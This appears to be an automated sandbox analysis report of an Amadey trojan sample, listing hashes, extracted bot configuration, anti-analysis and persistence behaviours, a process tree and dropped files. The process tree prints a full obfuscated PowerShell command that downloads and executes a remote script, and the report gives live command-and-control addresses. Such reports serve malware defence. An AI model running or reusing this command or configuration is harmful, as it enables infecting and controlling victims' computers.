Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-12-2024 04:12

General

  • Target

    f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe

  • Size

    2.9MB

  • MD5

    ec7b05f32fd59ca03e74b81122e281e1

  • SHA1

    eee35a743247328ec1a72d86d7ef88f28052f07f

  • SHA256

    f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58

  • SHA512

    32cf5a23fab49378e23586788260ab1321987b5fc7dfa9ea1a1a4f49194459898c543eca203ae3341c5c579b8c4fc4389955204f5feb776b96e6d4b17edff14d

  • SSDEEP

    49152:Q1NKgsM28NU/LBxQdiq/jjiBI70SITpUM2y:mg828NU/9xwpRQjTH2y

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.11.61.104/Z.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe
    "C:\Users\Admin\AppData\Local\Temp\f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe
        "C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
      • C:\Users\Admin\AppData\Local\Temp\1015216001\wOKhy9f.exe
        "C:\Users\Admin\AppData\Local\Temp\1015216001\wOKhy9f.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -Command " $L='(New-Object Net.We'; $Y='bClient).Downlo'; $V='adString(''http://185.11.61.104/Z.png'')'; $F=I`E`X ($L,$Y,$V -Join '')|I`E`X"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\system32\ipconfig.exe
            "C:\Windows\system32\ipconfig.exe" /flushdns
            5⤵
            • Gathers network information
            PID:1280
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1256 -s 568
          4⤵
            PID:1372

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe

      Filesize

      302KB

      MD5

      a9502d407c7a3e0c43ad669c27638793

      SHA1

      bf0b7815c6dac82643a5bf7bd397a6aa58a9e803

      SHA256

      5f3cd8392c045a321ccf0ede6f38a4016a236f257d0a6ab897bf7f3e21868135

      SHA512

      0dbe8772ded05ba2c67ea7a7e9bc291b76d8b73dbab86a35fca5b1138be41c2ee7a54333fcd7bf58823ab3b5f1f6250b98b829ca0c367cafb2176350f5454d25

    • C:\Users\Admin\AppData\Local\Temp\1015216001\wOKhy9f.exe

      Filesize

      55KB

      MD5

      dad92292227e72a4a6d88bb64a5530ab

      SHA1

      b29347362de7bc1f024bef9e816e22dcae43876f

      SHA256

      e0bbeb44a30e92fcf141c350b4d4240c488821ede6cf83b03c1b7d726a87c5f5

      SHA512

      d3f3b4b35fe4bd012b7d2c8d5b3bb434a50661ef4d1dff8ce0f5ef47d9b5b6e808286c39eef766ed53c4d09d54fc08ea1e3592b41c942b0e4f81e8de33ae58b3

    • C:\Users\Admin\AppData\Local\Temp\1015305001\94CwbGg.exe

      Filesize

      160KB

      MD5

      1ab5b0c0ab25c1b3547ed38d773190a2

      SHA1

      0d2bd31c8f0678087d47b67a07d7f072320ed7b2

      SHA256

      880a1dbec62a69905ad0dc95cf6a9d957e2b49c2d0b4aa086ab9302cc8e9ae11

      SHA512

      8493ebedad92c6151243b8a43a8770695b51aa515d03947b24bc167e9e14665a3b331e1eada59d1956ad2db4578a46bdd680288494b062f0fc3977194683c7e2

    • \Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

      Filesize

      2.9MB

      MD5

      ec7b05f32fd59ca03e74b81122e281e1

      SHA1

      eee35a743247328ec1a72d86d7ef88f28052f07f

      SHA256

      f638d07d2ed9ca3c918bbeef9d93b67b6409e8a174f516afa184019d7c94de58

      SHA512

      32cf5a23fab49378e23586788260ab1321987b5fc7dfa9ea1a1a4f49194459898c543eca203ae3341c5c579b8c4fc4389955204f5feb776b96e6d4b17edff14d

    • memory/1256-64-0x00000000003D0000-0x00000000003D6000-memory.dmp

      Filesize

      24KB

    • memory/1256-63-0x0000000000950000-0x0000000000964000-memory.dmp

      Filesize

      80KB

    • memory/2228-18-0x00000000067F0000-0x0000000006B19000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-6-0x00000000009C0000-0x0000000000CE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-1-0x00000000777C0000-0x00000000777C2000-memory.dmp

      Filesize

      8KB

    • memory/2228-0-0x00000000009C0000-0x0000000000CE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-17-0x00000000067F0000-0x0000000006B19000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-21-0x00000000009C0000-0x0000000000CE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-2-0x00000000009C1000-0x00000000009EF000-memory.dmp

      Filesize

      184KB

    • memory/2228-4-0x00000000009C0000-0x0000000000CE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2228-3-0x00000000009C0000-0x0000000000CE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-76-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-88-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-48-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-27-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-26-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-24-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-94-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-93-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-92-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-72-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-73-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-74-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-75-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-23-0x0000000000CC1000-0x0000000000CEF000-memory.dmp

      Filesize

      184KB

    • memory/2808-77-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-22-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-47-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-89-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-90-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2808-91-0x0000000000CC0000-0x0000000000FE9000-memory.dmp

      Filesize

      3.2MB

    • memory/2940-71-0x0000000002BB0000-0x0000000002BCC000-memory.dmp

      Filesize

      112KB

    • memory/2940-70-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/2940-69-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB